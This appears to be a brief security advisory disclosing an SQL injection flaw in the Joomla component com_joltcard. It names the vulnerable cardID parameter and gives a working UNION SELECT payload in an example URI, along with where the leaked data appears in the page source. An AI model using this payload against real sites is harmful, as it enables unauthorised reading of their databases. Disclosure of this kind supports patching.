Joomla Component com_joltcard SQL Injection Vulnerability

The Joomla component com_joltcard suffers from a SQL injection vulnerability.

Vulnerable Parameter(s)

cardID

Example URI

index.php?option=com_joltcard&Itemid=XX&task=view&cardID=X

+AND+1=2+UNION+SELECT+concat(database())–

Selected information gets only displayed within the HTML source code (look at <OBJECT> tag).

Please view the advisory here.